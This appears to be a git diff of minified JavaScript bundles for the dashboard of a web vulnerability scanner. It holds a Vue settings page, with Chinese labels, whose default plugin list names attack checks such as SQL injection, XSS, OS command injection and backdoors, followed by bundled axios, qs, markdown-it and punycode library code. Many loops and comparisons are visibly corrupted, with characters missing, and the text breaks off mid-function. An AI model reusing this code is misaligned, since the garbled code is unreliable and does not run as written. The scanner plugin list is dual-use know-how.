a("div",{staticClass:"dashboard-container"},[a("el-descriptions",{staticClass:"margin-top",attrs:{title:"扫描器配置参数",border:"",column:3}},[a("template",{slot:"extra"},[a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerCreateOpera}},[e._v("修改配置")])],1),a("el-descriptions-item",{attrs:{label:"扫描深度"}},[a("el-tag",{attrs:{size:"small"}},[e._v(e._s(e.createModel.ScanDep)+"/层")])],1),a("el-descriptions-item",{attrs:{label:"扫描通用UserAgent"}},[e._v(" "+e._s(e.createModel.ScanUserAgent)+" ")]),a("el-descriptions-item",{attrs:{label:"并发数"}},[a("el-tag",{attrs:{size:"small"}},[e._v(e._s(e.createModel.ScanRequestConcurrency)+"次/每秒")])],1),a("el-descriptions-item",{attrs:{label:"扫描插件",labelStyle:"width: 90px"}},[e._v(" "+e._s(e.createModel.ScanPlugins)+" ")])],2),a("el-drawer",{attrs:{visible:e.drawerCreateStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"扫描器参数配置"},on:{"update:visible":function(t){e.drawerCreateStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("div",{staticClass:"tip",staticStyle:{margin:"20px","margin-top":"-1px","font-size":"14px",color:"#5e6d82","line-height":"1.5em"}},[e._v(" 参数配置应用到全局,直接生效,每次激活扫描时自动带着参数下发,工作台统一管理。 ")]),a("div",{staticClass:"tip",staticStyle:{margin:"20px","margin-top":"-1px","font-size":"14px",color:"#f56c6c","line-height":"1.5em"}},[e._v(" 扫描并发数,一定要慎重,太高容易导致业务系统卡顿,如扫描节点配置低,也会导致扫描节点瘫痪。 ")]),a("div",{staticClass:"tip",staticStyle:{margin:"20px","margin-top":"-1px","font-size":"14px",color:"#f56c6c","line-height":"1.5em"}},[e._v(" 如果使用云翻译,请在腾讯云上开启这个服务,这个服务要求有两个,把AccessKey和AccessTOKEN托管到平台,其次,开启「机器翻译」,缺一不可。 ")]),a("el-form",{ref:"createModel",staticStyle:{"margin-left":"5px","margin-right":"15px"},attrs:{model:e.createModel,inline:!1,"label-width":"110px"}},[a("el-form-item",{attrs:{label:"爬虫深度"}},[a("el-input-number",{attrs:{min:1,max:5,label:"1-5的深度"},model:{value:e.createModel.ScanDep,callback:function(t){e.$set(e.createModel,"ScanDep",t)},expression:"createModel.ScanDep"}}),a("el-tooltip",{staticClass:"item",staticStyle:{"margin-left":"20px"},attrs:{effect:"dark",content:"默认0-5的深度",placement:"right"}},[a("i",{staticClass:"el-icon-warning-outline"})])],1),a("el-form-item",{attrs:{label:"扫描并发数"}},[a("el-input-number",{attrs:{min:1,max:20,label:""},model:{value:e.createModel.ScanRequestConcurrency,callback:function(t){e.$set(e.createModel,"ScanRequestConcurrency",t)},expression:"createModel.ScanRequestConcurrency"}}),a("el-tooltip",{staticClass:"item",staticStyle:{"margin-left":"20px"},attrs:{effect:"dark",content:"默认5-20",placement:"right-end"}},[a("i",{staticClass:"el-icon-warning-outline"})])],1),a("el-form-item",{attrs:{label:"扫描请求UA: "}},[a("el-input",{attrs:{type:"textarea"},model:{value:e.createModel.ScanUserAgent,callback:function(t){e.$set(e.createModel,"ScanUserAgent",t)},expression:"createModel.ScanUserAgent"}})],1),a("el-form-item",{attrs:{label:"扫描插件: "}},[a("el-input",{attrs:{type:"textarea",rows:"5"},model:{value:e.createModel.ScanPlugins,callback:function(t){e.$set(e.createModel,"ScanPlugins",t)},expression:"createModel.ScanPlugins"}})],1),a("el-form-item",{attrs:{label:"开启云翻译: "}},[a("el-switch",{attrs:{"active-color":"#13ce66","inactive-color":"#ff4949"},model:{value:e.createModel.ScanInfoTranslate,callback:function(t){e.$set(e.createModel,"ScanInfoTranslate",t)},expression:"createModel.ScanInfoTranslate"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerChange}},[e._v(" 修改参数配置")])],1)],1)])],1)},r=[],i=a("333d"),s=a("b775"),o=a("4328"),c=a.n(o);function l(e){return s["a"].post("/webscans/webScanConfig",c.a.stringify(e))}function u(e){return s["a"].post("/webscans/webScanConfigUpdate",c.a.stringify(e))}var d={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{drawerCreateStatus:!1,listLoading:!1,newAlterSize:"35%",listQuery:{page:1,limit:10,total:0},listDataObject:{outSideListData:[]},markdownOption:{bold:!0,italic:!0,underline:!0,strikethrough:!0,quote:!0,code:!0,imagelink:!0,fullscreen:!0,link:!0,trash:!0,subfield:!0},createModel:{ScanInfoTranslate:!0,ScanDep:1,ScanRequestConcurrency:1,ScanUserAgent:"",ScanInfoTranslateStatus:1,ScanPlugins:'"allowed_methods", "backdoors", "backup_directories", "backup_files", "captcha", "code_injection", "code_injection_php_input_wrapper", "code_injection_timing", "common_admin_interfaces", "common_directories", "common_files", "cookie_set_for_parent_domain", "credit_card", "csrf", "cvs_svn_users", "directory_listing", "emails", "file_inclusion", "form_upload", "hsts", "htaccess_limit", "html_objects", "http_only_cookies", "http_put", "insecure_client_access_policy", "insecure_cookies", "insecure_cors_policy", "insecure_cross_domain_policy_access", "insecure_cross_domain_policy_headers", "interesting_responses", "ldap_injection", "localstart_asp", "mixed_resource", "no_sql_injection", "no_sql_injection_differential", "origin_spoof_access_restriction_bypass", "os_cmd_injection", "os_cmd_injection_timing", "password_autocomplete", "path_traversal", "private_ip", "response_splitting", "rfi", "session_fixation", "source_code_disclosure", "sql_injection", "sql_injection_differential", "sql_injection_timing", "ssn", "trainer", "unencrypted_password_forms", "unvalidated_redirect", "unvalidated_redirect_dom", "webdav", "x_frame_options", "xpath_injection", "xss", "xss_dom", "xss_dom_script_context", "xss_event", "xss_path", "xss_script_context", "xss_tag", "xst", "xxe"'},direction:"rtl"}},computed:{},watch:{},created:function(){},mounted:function(){this.getList()},methods:{drawerCreateOpera:function(){var e=this;this.drawerCreateStatus?this.drawerCreateStatus=!1:l().then((function(t){if(1===t.status){for(var a=0;a0?(e.createModel.ScanInfoTranslate=!0,e.createModel.ScanInfoTranslateStatus=1):(e.createModel.ScanInfoTranslate=!1,e.createModel.ScanInfoTranslateStatus=0);break}e.drawerCreateStatus=!0}}))},drawerChange:function(){var e=this;u(this.createModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerCreateOpera()):e.$message.error(t.msg)}))},checkDv:function(){var e=document.body.clientWidth;e>1619&&(this.newAlterSize="15%")},getList:function(){var e=this;this.listLoading=!0,l().then((function(t){if(e.listLoading=!1,1===t.status)for(var a=0;a0?(e.createModel.ScanInfoTranslate=!0,e.createModel.ScanInfoTranslateStatus=1):(e.createModel.ScanInfoTranslate=!1,e.createModel.ScanInfoTranslateStatus=0);break}}))}}},p=d,f=(a("e76a"),a("4771"),a("2877")),m=Object(f["a"])(p,n,r,!1,null,"48453f3c",null);t["default"]=m.exports},c4ef:function(e,t,a){},e76a:function(e,t,a){"use strict";a("c4ef")},f1df:function(e,t,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-83ad3bcc.09f5857d.js b/frontend/dist/static/js/chunk-83ad3bcc.09f5857d.js new file mode 100644 index 0000000..fe355ca --- /dev/null +++ b/frontend/dist/static/js/chunk-83ad3bcc.09f5857d.js @@ -0,0 +1,8 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-83ad3bcc"],{"044b":function(e,t){ +/*! + * Determine if an object is a Buffer + * + * @author Feross Aboukhadijeh + * @license MIT + */ +e.exports=function(e){return null!=e&&null!=e.constructor&&"function"===typeof e.constructor.isBuffer&&e.constructor.isBuffer(e)}},"0a06":function(e,t,r){"use strict";var n=r("2444"),o=r("c532"),i=r("f6b4"),a=r("5270");function s(e){this.defaults=e,this.interceptors={request:new i,response:new i}}s.prototype.request=function(e){"string"===typeof e&&(e=o.merge({url:arguments[0]},arguments[1])),e=o.merge(n,{method:"get"},this.defaults,e),e.method=e.method.toLowerCase();var t=[a,void 0],r=Promise.resolve(e);this.interceptors.request.forEach((function(e){t.unshift(e.fulfilled,e.rejected)})),this.interceptors.response.forEach((function(e){t.push(e.fulfilled,e.rejected)}));while(t.length)r=r.then(t.shift(),t.shift());return r},o.forEach(["delete","get","head","options"],(function(e){s.prototype[e]=function(t,r){return this.request(o.merge(r||{},{method:e,url:t}))}})),o.forEach(["post","put","patch"],(function(e){s.prototype[e]=function(t,r,n){return this.request(o.merge(n||{},{method:e,url:t,data:r}))}})),e.exports=s},"0df6":function(e,t,r){"use strict";e.exports=function(e){return function(t){return e.apply(null,t)}}},"1d2b":function(e,t,r){"use strict";e.exports=function(e,t){return function(){for(var r=new Array(arguments.length),n=0;n=200&&e<300},headers:{common:{Accept:"application/json, text/plain, */*"}}};n.forEach(["delete","get","head"],(function(e){c.headers[e]={}})),n.forEach(["post","put","patch"],(function(e){c.headers[e]=n.merge(i)})),e.exports=c}).call(this,r("4362"))},"2d83":function(e,t,r){"use strict";var n=r("387f");e.exports=function(e,t,r,o,i){var a=new Error(e);return n(a,t,r,o,i)}},"2e67":function(e,t,r){"use strict";e.exports=function(e){return!(!e||!e.__CANCEL__)}},"30b5":function(e,t,r){"use strict";var n=r("c532");function o(e){return encodeURIComponent(e).replace(/%40/gi,"@").replace(/%3A/gi,":").replace(/%24/g,"$").replace(/%2C/gi,",").replace(/%20/g,"+").replace(/%5B/gi,"[").replace(/%5D/gi,"]")}e.exports=function(e,t,r){if(!t)return e;var i;if(r)i=r(t);else if(n.isURLSearchParams(t))i=t.toString();else{var a=[];n.forEach(t,(function(e,t){null!==e&&"undefined"!==typeof e&&(n.isArray(e)?t+="[]":e=[e],n.forEach(e,(function(e){n.isDate(e)?e=e.toISOString():n.isObject(e)&&(e=JSON.stringify(e)),a.push(o(t)+"="+o(e))})))})),i=a.join("&")}return i&&(e+=(-1===e.indexOf("?")?"?":"&")+i),e}},"387f":function(e,t,r){"use strict";e.exports=function(e,t,r,n,o){return e.config=t,r&&(e.code=r),e.request=n,e.response=o,e}},3934:function(e,t,r){"use strict";var n=r("c532");e.exports=n.isStandardBrowserEnv()?function(){var e,t=/(msie|trident)/i.test(navigator.userAgent),r=document.createElement("a");function o(e){var n=e;return t&&(r.setAttribute("href",n),n=r.href),r.setAttribute("href",n),{href:r.href,protocol:r.protocol?r.protocol.replace(/:$/,""):"",host:r.host,search:r.search?r.search.replace(/^\?/,""):"",hash:r.hash?r.hash.replace(/^#/,""):"",hostname:r.hostname,port:r.port,pathname:"/"===r.pathname.charAt(0)?r.pathname:"/"+r.pathname}}return e=o(window.location.href),function(t){var r=n.isString(t)?o(t):t;return r.protocol===e.protocol&&r.host===e.host}}():function(){return function(){return!0}}()},4127:function(e,t,r){"use strict";var n=r("d233"),o=r("b313"),i={brackets:function(e){return e+"[]"},indices:function(e,t){return e+"["+t+"]"},repeat:function(e){return e}},a=Array.isArray,s=Array.prototype.push,c=function(e,t){s.apply(e,a(t)?t:[t])},u=Date.prototype.toISOString,f={delimiter:"&",encode:!0,encoder:n.encode,encodeValuesOnly:!1,serializeDate:function(e){return u.call(e)},skipNulls:!1,strictNullHandling:!1},l=function e(t,r,o,i,s,u,l,p,d,h,y,m){var g=t;if("function"===typeof l?g=l(r,g):g instanceof Date&&(g=h(g)),null===g){if(i)return u&&!m?u(r,f.encoder):r;g=""}if("string"===typeof g||"number"===typeof g||"boolean"===typeof g||n.isBuffer(g)){if(u){var b=m?r:u(r,f.encoder);return[y(b)+"="+y(u(g,f.encoder))]}return[y(r)+"="+y(String(g))]}var v,w=[];if("undefined"===typeof g)return w;if(a(l))v=l;else{var x=Object.keys(g);v=p?x.sort(p):x}for(var j=0;j0?N+S:""}},4328:function(e,t,r){"use strict";var n=r("4127"),o=r("9e6a"),i=r("b313");e.exports={formats:i,parse:o,stringify:n}},"467f":function(e,t,r){"use strict";var n=r("2d83");e.exports=function(e,t,r){var o=r.config.validateStatus;r.status&&o&&!o(r.status)?t(n("Request failed with status code "+r.status,r.config,null,r.request,r)):e(r)}},5270:function(e,t,r){"use strict";var n=r("c532"),o=r("c401"),i=r("2e67"),a=r("2444"),s=r("d925"),c=r("e683");function u(e){e.cancelToken&&e.cancelToken.throwIfRequested()}e.exports=function(e){u(e),e.baseURL&&!s(e.url)&&(e.url=c(e.baseURL,e.url)),e.headers=e.headers||{},e.data=o(e.data,e.headers,e.transformRequest),e.headers=n.merge(e.headers.common||{},e.headers[e.method]||{},e.headers||{}),n.forEach(["delete","get","head","post","put","patch","common"],(function(t){delete e.headers[t]}));var t=e.adapter||a.adapter;return t(e).then((function(t){return u(e),t.data=o(t.data,t.headers,e.transformResponse),t}),(function(t){return i(t)||(u(e),t&&t.response&&(t.response.data=o(t.response.data,t.response.headers,e.transformResponse))),Promise.reject(t)}))}},"7a77":function(e,t,r){"use strict";function n(e){this.message=e}n.prototype.toString=function(){return"Cancel"+(this.message?": "+this.message:"")},n.prototype.__CANCEL__=!0,e.exports=n},"7aac":function(e,t,r){"use strict";var n=r("c532");e.exports=n.isStandardBrowserEnv()?function(){return{write:function(e,t,r,o,i,a){var s=[];s.push(e+"="+encodeURIComponent(t)),n.isNumber(r)&&s.push("expires="+new Date(r).toGMTString()),n.isString(o)&&s.push("path="+o),n.isString(i)&&s.push("domain="+i),!0===a&&s.push("secure"),document.cookie=s.join("; ")},read:function(e){var t=document.cookie.match(new RegExp("(^|;\\s*)("+e+")=([^;]*)"));return t?decodeURIComponent(t[3]):null},remove:function(e){this.write(e,"",Date.now()-864e5)}}}():function(){return{write:function(){},read:function(){return null},remove:function(){}}}()},"8df4":function(e,t,r){"use strict";var n=r("7a77");function o(e){if("function"!==typeof e)throw new TypeError("executor must be a function.");var t;this.promise=new Promise((function(e){t=e}));var r=this;e((function(e){r.reason||(r.reason=new n(e),t(r.reason))}))}o.prototype.throwIfRequested=function(){if(this.reason)throw this.reason},o.source=function(){var e,t=new o((function(t){e=t}));return{token:t,cancel:e}},e.exports=o},"9e6a":function(e,t,r){"use strict";var n=r("d233"),o=Object.prototype.hasOwnProperty,i={allowDots:!1,allowPrototypes:!1,arrayLimit:20,decoder:n.decode,delimiter:"&",depth:5,parameterLimit:1e3,plainObjects:!1,strictNullHandling:!1},a=function(e,t){for(var r={},n=t.ignoreQueryPrefix?e.replace(/^\?/,""):e,a=t.parameterLimit===1/0?void 0:t.parameterLimit,s=n.split(t.delimiter,a),c=0;c=0;--o){var i,a=e[o];if("[]"===a&&r.parseArrays)i=[].concat(n);else{i=r.plainObjects?Object.create(null):{};var s="["===a.charAt(0)&&"]"===a.charAt(a.length-1)?a.slice(1,-1):a,c=parseInt(s,10);r.parseArrays||""!==s?!isNaN(c)&&a!==s&&String(c)===s&&c>=0&&r.parseArrays&&c<=r.arrayLimit?(i=[],i[c]=n):"__proto__"!==s&&(i[s]=n):i={0:n}}n=i}return n},c=function(e,t,r){if(e){var n=r.allowDots?e.replace(/\.([^.[]+)/g,"[$1]"):e,i=/(\[[^[\]]*])/,a=/(\[[^[\]]*])/g,c=i.exec(n),u=c?n.slice(0,c.index):n,f=[];if(u){if(!r.plainObjects&&o.call(Object.prototype,u)&&!r.allowPrototypes)return;f.push(u)}var l=0;while(null!==(c=a.exec(n))&&l=0)return;a[t]="set-cookie"===t?(a[t]?a[t]:[]).concat([r]):a[t]?a[t]+", "+r:r}})),a):a}},c401:function(e,t,r){"use strict";var n=r("c532");e.exports=function(e,t,r){return n.forEach(r,(function(r){e=r(e,t)})),e}},c532:function(e,t,r){"use strict";var n=r("1d2b"),o=r("044b"),i=Object.prototype.toString;function a(e){return"[object Array]"===i.call(e)}function s(e){return"[object ArrayBuffer]"===i.call(e)}function c(e){return"undefined"!==typeof FormData&&e instanceof FormData}function u(e){var t;return t="undefined"!==typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer&&e.buffer instanceof ArrayBuffer,t}function f(e){return"string"===typeof e}function l(e){return"number"===typeof e}function p(e){return"undefined"===typeof e}function d(e){return null!==e&&"object"===typeof e}function h(e){return"[object Date]"===i.call(e)}function y(e){return"[object File]"===i.call(e)}function m(e){return"[object Blob]"===i.call(e)}function g(e){return"[object Function]"===i.call(e)}function b(e){return d(e)&&g(e.pipe)}function v(e){return"undefined"!==typeof URLSearchParams&&e instanceof URLSearchParams}function w(e){return e.replace(/^\s*/,"").replace(/\s*$/,"")}function x(){return("undefined"===typeof navigator||"ReactNative"!==navigator.product)&&("undefined"!==typeof window&&"undefined"!==typeof document)}function j(e,t){if(null!==e&&"undefined"!==typeof e)if("object"!==typeof e&&(e=[e]),a(e))for(var r=0,n=e.length;r=48&&i<=57||i>=65&&i<=90||i>=97&&i<=122?r+=t.charAt(n):i<128?r+=o[i]:i<2048?r+=o[192|i>>6]+o[128|63&i]:i<55296||i>=57344?r+=o[224|i>>12]+o[128|i>>6&63]+o[128|63&i]:(n+=1,i=65536+((1023&i)<<10|1023&t.charCodeAt(n)),r+=o[240|i>>18]+o[128|i>>12&63]+o[128|i>>6&63]+o[128|63&i])}return r},l=function(e){for(var t=[{obj:{o:e},prop:"o"}],r=[],n=0;n=55296&&e<=57343)&&(!(e>=64976&&e<=65007)&&(65535!==(65535&e)&&65534!==(65535&e)&&(!(e>=0&&e<=8)&&(11!==e&&(!(e>=14&&e<=31)&&(!(e>=127&&e<=159)&&!(e>1114111)))))))}function l(e){if(e>65535){e-=65536;var t=55296+(e>>10),r=56320+(1023&e);return String.fromCharCode(t,r)}return String.fromCharCode(e)}var p=/\\([!"#$%&'()*+,\-.\/:;<=>?@[\\\]^_`{|}~])/g,h=/&([a-z#][a-z0-9]{1,31});/gi,f=new RegExp(p.source+"|"+h.source,"gi"),d=/^#((?:x[a-f0-9]{1,8}|[0-9]{1,8}))/i,m=r("bd68");function g(e,t){var r=0;return o(m,t)?m[t]:35===t.charCodeAt(0)&&d.test(t)&&(r="x"===t[1].toLowerCase()?parseInt(t.slice(2),16):parseInt(t.slice(1),10),u(r))?l(r):e}function _(e){return e.indexOf("\\")<0?e:e.replace(p,"$1")}function b(e){return e.indexOf("\\")<0&&e.indexOf("&")<0?e:e.replace(f,(function(e,t,r){return t||g(e,r)}))}var k=/[&<>"]/,v=/[&<>"]/g,y={"&":"&","<":"<",">":">",'"':"""};function C(e){return y[e]}function x(e){return k.test(e)?e.replace(v,C):e}var A=/[.?*+^$[\]\\(){}|-]/g;function w(e){return e.replace(A,"\\$&")}function D(e){switch(e){case 9:case 32:return!0}return!1}function E(e){if(e>=8192&&e<=8202)return!0;switch(e){case 9:case 10:case 11:case 12:case 13:case 32:case 160:case 5760:case 8239:case 8287:case 12288:return!0}return!1}var q=r("7ca0");function S(e){return q.test(e)}function F(e){switch(e){case 33:case 34:case 35:case 36:case 37:case 38:case 39:case 40:case 41:case 42:case 43:case 44:case 45:case 46:case 47:case 58:case 59:case 60:case 61:case 62:case 63:case 64:case 91:case 92:case 93:case 94:case 95:case 96:case 123:case 124:case 125:case 126:return!0;default:return!1}}function L(e){return e=e.trim().replace(/\s+/g," "),"Ṿ"==="ẞ".toLowerCase()&&(e=e.replace(/ẞ/g,"ß")),e.toLowerCase().toUpperCase()}t.lib={},t.lib.mdurl=r("d8a61"),t.lib.ucmicro=r("d5d1"),t.assign=a,t.isString=s,t.has=o,t.unescapeMd=_,t.unescapeAll=b,t.isValidEntityCode=u,t.fromCodePoint=l,t.escapeHtml=x,t.arrayReplaceAt=c,t.isSpace=D,t.isWhiteSpace=E,t.isMdAsciiPunct=F,t.isPunctChar=S,t.escapeRE=w,t.normalizeReference=L},"0758":function(e,t,r){"use strict";var n=r("0068").isSpace;e.exports=function(e,t,r,s){var i,o,a,c,u=e.bMarks[t]+e.tShift[t],l=e.eMarks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(i=e.src.charCodeAt(u),35!==i||u>=l)return!1;o=1,i=e.src.charCodeAt(++u);while(35===i&&u6||uu&&n(e.src.charCodeAt(a-1))&&(l=a),e.line=t+1,c=e.push("heading_open","h"+String(o),1),c.markup="########".slice(0,o),c.map=[t,e.line],c=e.push("inline","",0),c.content=e.src.slice(u,l).trim(),c.map=[t,e.line],c.children=[],c=e.push("heading_close","h"+String(o),-1),c.markup="########".slice(0,o)),!0)}},"08ae":function(e,t,r){"use strict";var n=r("0068"),s=r("565b"),i=r("7cc2"),o=r("a915"),a=r("7696"),c=r("4cb4"),u=r("fbcd"),l=r("d8a61"),p=r("1985"),h={default:r("8a31"),zero:r("1caa"),commonmark:r("428d")},f=/^(vbscript|javascript|file|data):/,d=/^data:image\/(gif|png|jpeg|webp);/;function m(e){var t=e.trim().toLowerCase();return!f.test(t)||!!d.test(t)}var g=["http:","https:","mailto:"];function _(e){var t=l.parse(e,!0);if(t.hostname&&(!t.protocol||g.indexOf(t.protocol)>=0))try{t.hostname=p.toASCII(t.hostname)}catch(r){}return l.encode(l.format(t))}function b(e){var t=l.parse(e,!0);if(t.hostname&&(!t.protocol||g.indexOf(t.protocol)>=0))try{t.hostname=p.toUnicode(t.hostname)}catch(r){}return l.decode(l.format(t),l.decode.defaultChars+"%")}function k(e,t){if(!(this instanceof k))return new k(e,t);t||n.isString(e)||(t=e||{},e="default"),this.inline=new c,this.block=new a,this.core=new o,this.renderer=new i,this.linkify=new u,this.validateLink=m,this.normalizeLink=_,this.normalizeLinkText=b,this.utils=n,this.helpers=n.assign({},s),this.options={},this.configure(e),t&&this.set(t)}k.prototype.set=function(e){return n.assign(this.options,e),this},k.prototype.configure=function(e){var t,r=this;if(n.isString(e)&&(t=e,e=h[t],!e))throw new Error('Wrong `markdown-it` preset "'+t+'", check name');if(!e)throw new Error("Wrong `markdown-it` preset, can't be empty");return e.options&&r.set(e.options),e.components&&Object.keys(e.components).forEach((function(t){e.components[t].rules&&r[t].ruler.enableOnly(e.components[t].rules),e.components[t].rules2&&r[t].ruler2.enableOnly(e.components[t].rules2)})),this},k.prototype.enable=function(e,t){var r=[];Array.isArray(e)||(e=[e]),["core","block","inline"].forEach((function(t){r=r.concat(this[t].ruler.enable(e,!0))}),this),r=r.concat(this.inline.ruler2.enable(e,!0));var n=e.filter((function(e){return r.indexOf(e)<0}));if(n.length&&!t)throw new Error("MarkdownIt. Failed to enable unknown rule(s): "+n);return this},k.prototype.disable=function(e,t){var r=[];Array.isArray(e)||(e=[e]),["core","block","inline"].forEach((function(t){r=r.concat(this[t].ruler.disable(e,!0))}),this),r=r.concat(this.inline.ruler2.disable(e,!0));var n=e.filter((function(e){return r.indexOf(e)<0}));if(n.length&&!t)throw new Error("MarkdownIt. Failed to disable unknown rule(s): "+n);return this},k.prototype.use=function(e){var t=[this].concat(Array.prototype.slice.call(arguments,1));return e.apply(e,t),this},k.prototype.parse=function(e,t){if("string"!==typeof e)throw new Error("Input data should be a String");var r=new this.core.State(e,this,t);return this.core.process(r),r.tokens},k.prototype.render=function(e,t){return t=t||{},this.renderer.render(this.parse(e,t),this.options,t)},k.prototype.parseInline=function(e,t){var r=new this.core.State(e,this,t);return r.inlineMode=!0,this.core.process(r),r.tokens},k.prototype.renderInline=function(e,t){return t=t||{},this.renderer.render(this.parseInline(e,t),this.options,t)},e.exports=k},"096b":function(e,t,r){"use strict";function n(e,t,r){this.type=e,this.tag=t,this.attrs=null,this.map=null,this.nesting=r,this.level=0,this.children=null,this.content="",this.markup="",this.info="",this.meta=null,this.block=!1,this.hidden=!1}n.prototype.attrIndex=function(e){var t,r,n;if(!this.attrs)return-1;for(t=this.attrs,r=0,n=t.length;r=0&&(r=this.attrs[t][1]),r},n.prototype.attrJoin=function(e,t){var r=this.attrIndex(e);r<0?this.attrPush([e,t]):this.attrs[r][1]=this.attrs[r][1]+" "+t},e.exports=n},"097b":function(e,t,r){"use strict";var n=r("096b"),s=r("0068").isWhiteSpace,i=r("0068").isPunctChar,o=r("0068").isMdAsciiPunct;function a(e,t,r,n){this.src=e,this.env=r,this.md=t,this.tokens=n,this.tokens_meta=Array(n.length),this.pos=0,this.posMax=this.src.length,this.level=0,this.pending="",this.pendingLevel=0,this.cache={},this.delimiters=[],this._prev_delimiters=[],this.backticks={},this.backticksScanned=!1,this.linkLevel=0}a.prototype.pushPending=function(){var e=new n("text","",0);return e.content=this.pending,e.level=this.pendingLevel,this.tokens.push(e),this.pending="",e},a.prototype.push=function(e,t,r){this.pending&&this.pushPending();var s=new n(e,t,r),i=null;return r<0&&(this.level--,this.delimiters=this._prev_delimiters.pop()),s.level=this.level,r>0&&(this.level++,this._prev_delimiters.push(this.delimiters),this.delimiters=[],i={delimiters:this.delimiters}),this.pendingLevel=this.level,this.tokens.push(s),this.tokens_meta.push(i),s},a.prototype.scanDelims=function(e,t){var r,n,a,c,u,l,p,h,f,d=e,m=!0,g=!0,_=this.posMax,b=this.src.charCodeAt(e);r=e>0?this.src.charCodeAt(e-1):32;while(d<_&&this.src.charCodeAt(d)===b)d++;return a=d-e,n=d<_?this.src.charCodeAt(d):32,p=o(r)||i(String.fromCharCode(r)),f=o(n)||i(String.fromCharCode(n)),l=s(r),h=s(n),h?m=!1:f&&(l||p||(m=!1)),l?g=!1:p&&(h||f||(g=!1)),t?(c=m,u=g):(c=m&&(!g||p),u=g&&(!m||f)),{can_open:c,can_close:u,length:a}},a.prototype.Token=n,e.exports=a},1985:function(e,t,r){(function(e,n){var s;/*! https://mths.be/punycode v1.4.1 by @mathias */(function(i){t&&t.nodeType,e&&e.nodeType;var o="object"==typeof n&&n;o.global!==o&&o.window!==o&&o.self;var a,c=2147483647,u=36,l=1,p=26,h=38,f=700,d=72,m=128,g="-",_=/^xn--/,b=/[^\x20-\x7E]/,k=/[\x2E\u3002\uFF0E\uFF61]/g,v={overflow:"Overflow: input needs wider integers to process","not-basic":"Illegal input >= 0x80 (not a basic code point)","invalid-input":"Invalid input"},y=u-l,C=Math.floor,x=String.fromCharCode;function A(e){throw new RangeError(v[e])}function w(e,t){var r=e.length,n=[];while(r--)n[r]=t(e[r]);return n}function D(e,t){var r=e.split("@"),n="";r.length>1&&(n=r[0]+"@",e=r[1]),e=e.replace(k,".");var s=e.split("."),i=w(s,t).join(".");return n+i}function E(e){var t,r,n=[],s=0,i=e.length;while(s=55296&&t<=56319&&s65535&&(e-=65536,t+=x(e>>>10&1023|55296),e=56320|1023&e),t+=x(e),t})).join("")}function S(e){return e-48<10?e-22:e-65<26?e-65:e-97<26?e-97:u}function F(e,t){return e+22+75*(e<26)-((0!=t)<<5)}function L(e,t,r){var n=0;for(e=r?C(e/f):e>>1,e+=C(e/t);e>y*p>>1;n+=u)e=C(e/y);return C(n+(y+1)*e/(e+h))}function z(e){var t,r,n,s,i,o,a,h,f,_,b=[],k=e.length,v=0,y=m,x=d;for(r=e.lastIndexOf(g),r<0&&(r=0),n=0;n=128&&A("not-basic"),b.push(e.charCodeAt(n));for(s=r>0?r+1:0;s=k&&A("invalid-input"),h=S(e.charCodeAt(s++)),(h>=u||h>C((c-v)/o))&&A("overflow"),v+=h*o,f=a<=x?l:a>=x+p?p:a-x,hC(c/_)&&A("overflow"),o*=_}t=b.length+1,x=L(v-i,t,0==i),C(v/t)>c-y&&A("overflow"),y+=C(v/t),v%=t,b.splice(v++,0,y)}return q(b)}function T(e){var t,r,n,s,i,o,a,h,f,_,b,k,v,y,w,D=[];for(e=E(e),k=e.length,t=m,r=0,i=d,o=0;o=t&&bC((c-r)/v)&&A("overflow"),r+=(a-t)*v,t=a,o=0;oc&&A("overflow"),b==t){for(h=r,f=u;;f+=u){if(_=f<=i?l:f>=i+p?p:f-i,h<_)break;w=h-_,y=u-_,D.push(x(F(_+w%y,0))),h=C(w/y)}D.push(x(F(h,0))),i=L(r,v,n==s),r=0,++n}++r,++t}return D.join("")}function I(e){return D(e,(function(e){return _.test(e)?z(e.slice(4).toLowerCase()):e}))}function M(e){return D(e,(function(e){return b.test(e)?"xn--"+T(e):e}))}a={version:"1.4.1",ucs2:{decode:E,encode:q},decode:z,encode:T,toASCII:M,toUnicode:I},s=function(){return a}.call(t,r,t,e),void 0===s||(e.exports=s)})()}).call(this,r("62e4")(e),r("c8ba"))},"199e":function(e,t,r){"use strict";e.exports=function(e,t,r){var n,s,i,o,a,c,u,l,p,h,f=t+1,d=e.md.block.ruler.getRules("paragraph");if(e.sCount[t]-e.blkIndent>=4)return!1;for(h=e.parentType,e.parentType="paragraph";f3)){if(e.sCount[f]>=e.blkIndent&&(c=e.bMarks[f]+e.tShift[f],u=e.eMarks[f],c=u)))){l=61===p?1:2;break}if(!(e.sCount[f]<0)){for(s=!1,i=0,o=d.length;i\x00-\x20]*)$/;e.exports=function(e,t){var r,i,o,a,c,u,l=e.pos;if(60!==e.src.charCodeAt(l))return!1;for(c=e.pos,u=e.posMax;;){if(++l>=u)return!1;if(a=e.src.charCodeAt(l),60===a)return!1;if(62===a)break}return r=e.src.slice(c+1,l),s.test(r)?(i=e.md.normalizeLink(r),!!e.md.validateLink(i)&&(t||(o=e.push("link_open","a",1),o.attrs=[["href",i]],o.markup="autolink",o.info="auto",o=e.push("text","",0),o.content=e.md.normalizeLinkText(r),o=e.push("link_close","a",-1),o.markup="autolink",o.info="auto"),e.pos+=r.length+2,!0)):!!n.test(r)&&(i=e.md.normalizeLink("mailto:"+r),!!e.md.validateLink(i)&&(t||(o=e.push("link_open","a",1),o.attrs=[["href",i]],o.markup="autolink",o.info="auto",o=e.push("text","",0),o.content=e.md.normalizeLinkText(r),o=e.push("link_close","a",-1),o.markup="autolink",o.info="auto"),e.pos+=r.length+2,!0))}},"32bf":function(e,t,r){"use strict";e.exports=function(e){var 